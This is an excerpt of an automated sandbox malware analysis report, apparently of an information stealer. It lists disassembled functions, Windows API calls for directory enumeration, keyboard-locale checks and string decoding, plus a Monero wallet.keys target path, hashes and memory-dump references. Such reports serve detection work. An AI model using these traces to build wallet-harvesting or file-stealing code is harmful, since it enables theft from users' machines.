                                          Yara matches
                                          Similarity
                                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                          • String ID: \*.*
                                          • API String ID: 1415058207-1173974218
                                          • Opcode ID: ee552921f51d9582c4afeaecec61f9251e75b9321221430a8896e26d87477b2d
                                          • Instruction ID: 4273d112d625e7dbde3cb4fd99394f81e3bae072acfcc59fccbf55fb698add40
                                          • Opcode Fuzzy Hash: ee552921f51d9582c4afeaecec61f9251e75b9321221430a8896e26d87477b2d
                                          • Instruction Fuzzy Hash: AC1281729102189BCB58FB60DC96AEE73B8AF59300F4551A9B1077A091EF347F89CF91
                                          Function 00E9DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00EB0C2E), ref: 00E9DE5E
                                          • StrCmpCA.SHLWAPI(?,00EB14C8), ref: 00E9DEAE
                                          • StrCmpCA.SHLWAPI(?,00EB14CC), ref: 00E9DEC4
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00E9E3E0
                                          • FindClose.KERNEL32(000000FF), ref: 00E9E3F2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                          • String ID: \*.*
                                          • API String ID: 2325840235-1173974218
                                          • Opcode ID: b80f26f0ab19e0f0ee74bd2c9bd563b4abd8cf5c0a0a0147f3702f99d9fc118c
                                          • Instruction ID: 0f82cdf403a88d93bb4026c1350e2a20f8cce8e82ed310f51d27c38fb90034c9
                                          • Opcode Fuzzy Hash: b80f26f0ab19e0f0ee74bd2c9bd563b4abd8cf5c0a0a0147f3702f99d9fc118c
                                          • Instruction Fuzzy Hash: 6CF10E728102189ACB59EB60DC95AEE73B8BF59300F8561E9B40B76091EF347F4ACF51
                                          Function 01252C3F Relevance: 14.2, Strings: 10, Instructions: 1670COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: "}$"}$0'O}$@swy$J{$V|s$e+k$f@/$~w[_$D=
                                          • API String ID: 0-2876167696
                                          • Opcode ID: 5c10bfe552203f3b74e04914e580f338612775095bb72e5ffc6bf30e2faa5118
                                          • Instruction ID: 2f6ec6f092222a164f054e1ea3e2693f41288ffc5e2380c5744249b8bfdfa936
                                          • Opcode Fuzzy Hash: 5c10bfe552203f3b74e04914e580f338612775095bb72e5ffc6bf30e2faa5118
                                          • Instruction Fuzzy Hash: 1DB225F3A0C2049FE3046E2DEC8577ABBEAEF94360F1A453DE6C4C3744EA7559018696
                                          Function 00E9DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EB14B0,00EB0C2A), ref: 00E9DAEB
                                          • StrCmpCA.SHLWAPI(?,00EB14B4), ref: 00E9DB33
                                          • StrCmpCA.SHLWAPI(?,00EB14B8), ref: 00E9DB49
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00E9DDCC
                                          • FindClose.KERNEL32(000000FF), ref: 00E9DDDE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                          • String ID:
                                          • API String ID: 3334442632-0
                                          • Opcode ID: ac8f4edcf827465330cdefcc41d67504b7c2e45ec2cf124f363bed024ae959a1
                                          • Instruction ID: aa64b2854e9063604fb34512181d7aae483468d8367a996b2312a217e1fb20e2
                                          • Opcode Fuzzy Hash: ac8f4edcf827465330cdefcc41d67504b7c2e45ec2cf124f363bed024ae959a1
                                          • Instruction Fuzzy Hash: F99145729002049BCF14FF70DC569FE73BCAB89300F459669B806BA145EF34AB09CB92
                                          Function 0125E826 Relevance: 11.6, Strings: 8, Instructions: 1629COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 9H9E$<X^$L.ot$VN:U$^$}G$uP;$zBzO$A{[
                                          • API String ID: 0-540469650
                                          • Opcode ID: 40689312aec328b67a625f13b0356ee94da427c3aa839608bda20b0add19530f
                                          • Instruction ID: 1c7c683f89dbdc3fea9bb187997b0a6b79981d4d3fecdabee8dcf51226dbaa00
                                          • Opcode Fuzzy Hash: 40689312aec328b67a625f13b0356ee94da427c3aa839608bda20b0add19530f
                                          • Instruction Fuzzy Hash: E9B216F3A0C2149FE3046E2DEC8567AFBE9EF94320F1A493DEAC4C7744E63558058696
                                          Function 00EA7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          • GetKeyboardLayoutList.USER32(00000000,00000000,00EB05AF), ref: 00EA7BE1
                                          • LocalAlloc.KERNEL32(00000040,?), ref: 00EA7BF9
                                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00EA7C0D
                                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00EA7C62
                                          • LocalFree.KERNEL32(00000000), ref: 00EA7D22
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                          • String ID: /
                                          • API String ID: 3090951853-4001269591
                                          • Opcode ID: e0953a57f8f8cb78437013ada208fe09c86e75ea4ad739178bdf6a244f1433b5
                                          • Instruction ID: 7a43c8b7e0062eaa3e8fa049b6de2062995b5e14e9246969ecc69be352410695
                                          • Opcode Fuzzy Hash: e0953a57f8f8cb78437013ada208fe09c86e75ea4ad739178bdf6a244f1433b5
                                          • Instruction Fuzzy Hash: 2F413B71941218ABDB64DF94DC99BEEB3B8FF49700F204199E40A7A181DB742F85CFA1
                                          Function 0125B3D7 Relevance: 10.4, Strings: 7, Instructions: 1653COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 6Dn$@\yn$Jh]w$N&c~$XKyw$`*$rQ[~
                                          • API String ID: 0-3100525379
                                          • Opcode ID: 9daa84c6957aa03a3894493383cdfacc4a4e3538cc82f1acfe29e5bea62886f1
                                          • Instruction ID: f5f7334600a7729e9ca1c4ad61745d47486f436be3b694a835552efdbc646f77
                                          • Opcode Fuzzy Hash: 9daa84c6957aa03a3894493383cdfacc4a4e3538cc82f1acfe29e5bea62886f1
                                          • Instruction Fuzzy Hash: 6FB218F360C204AFE3046E2DEC8567ABBE9EFD4320F1A463DEAC4D7744E63558058696
                                          Function 012563BA Relevance: 10.4, Strings: 7, Instructions: 1628COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: #[{e$,7$F}i$[&[^$[Gxi$`zo$E<=
                                          • API String ID: 0-2321347174
                                          • Opcode ID: d24b7794374d8e7c2f2a2bab7f7b5036c6e7cf17cae37b88dab63f37aeda2ff3
                                          • Instruction ID: 17bf3c6a76d148b49350a142d91b02fd3056dbe7db52b739828b0de4f056f1e8
                                          • Opcode Fuzzy Hash: d24b7794374d8e7c2f2a2bab7f7b5036c6e7cf17cae37b88dab63f37aeda2ff3
                                          • Instruction Fuzzy Hash: B0B24CF3A082049FD3046E2DEC8567ABBEAEFD4720F1A463DE6C4C3744E63599058697
                                          Function 0125CE4F Relevance: 10.3, Strings: 7, Instructions: 1548COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: A[7$HrF$Y]R$dS<$uno$x0~+$]_
                                          • API String ID: 0-2758577009
                                          • Opcode ID: a62fa7c93c1bf3fa1f66ce0d690d9b902163d3166579c5ae3ff1ff38b01b513a
                                          • Instruction ID: 426c78917b4fde4378d1b50f29201ddd9305dab940e46d0f491e5320c90ee063
                                          • Opcode Fuzzy Hash: a62fa7c93c1bf3fa1f66ce0d690d9b902163d3166579c5ae3ff1ff38b01b513a
                                          • Instruction Fuzzy Hash: 4BA2F3F3A08204AFE304AE2DEC4567AFBE9EF94720F16493DEAC4C3744E63558158796
                                          Function 00E9E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00EB0D73), ref: 00E9E4A2
                                          • StrCmpCA.SHLWAPI(?,00EB14F8), ref: 00E9E4F2
                                          • StrCmpCA.SHLWAPI(?,00EB14FC), ref: 00E9E508
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00E9EBDF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                          • String ID: \*.*
                                          • API String ID: 433455689-1173974218
                                          • Opcode ID: c3c9a5830cf1a9d1e777357eb89aba4427a12a84fe51c1f329da6b17b82c01b4
                                          • Instruction ID: 83f0d6501a4e94dc8c3aa66b6e8d9f16228fcc66153ee4fe5108cc30d28a5f47
                                          • Opcode Fuzzy Hash: c3c9a5830cf1a9d1e777357eb89aba4427a12a84fe51c1f329da6b17b82c01b4
                                          • Instruction Fuzzy Hash: C81243329002149BDB58FB60DC96AEE73B8AF59300F4551B9B50B7A091EF347F49CB92
                                          Function 00E99AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E99AEF
                                          • LocalAlloc.KERNEL32(00000040,?,?,?,00E94EEE,00000000,?), ref: 00E99B01
                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E99B2A
                                          • LocalFree.KERNEL32(?,?,?,?,00E94EEE,00000000,?), ref: 00E99B3F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
